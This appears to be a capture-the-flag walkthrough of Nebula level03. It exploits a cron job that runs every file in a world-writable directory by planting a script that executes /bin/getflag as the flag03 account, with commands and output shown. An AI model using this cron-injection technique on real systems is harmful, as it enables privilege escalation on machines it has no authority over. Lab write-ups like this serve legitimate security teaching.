In level03 challenge of Nebula, we are told that there is a crontab running every couple of minutes.
level03@nebula:/home/flag03$ ls -ltotal 8
drwxrwx rwx 2 flag03 flag03 4096 2012-10-29 03:03 writable.d
-rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
writable.d is a directory and as its name suggests, is world readable/writable.
writable.sh is the script that is executed every couple of minutes by the crontab.
The vulnerability lies in writable.sh running every file that in the writable.d directory combined with the fact that writable.d is world writable.
writable.sh is the script that is executed every couple of minutes by the crontab.
level03@nebula:/home/flag03$ cat writable.sh #!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
To exploit this vulnerability, we will write a script that will run the /bin/getflag program when executed.
level03@nebula:/home/flag03/writable.d$ echo "/bin/getflag >> /tmp/pwnlog03" > pwnie03After some time, the pwnie03 script will be run (and deleted afterwards by writable.sh).
level03@nebula:/home/flag03/writable.d$ cat pwnie03/bin/getflag >> /tmp/pwnlog03
level03@nebula:/home/flag03/writable.d$ lsAnd that is it, level03 done.
level03@nebula:/home/flag03/writable.d$ cat /tmp/pwnlog03
You have successfully executed getflag on a target account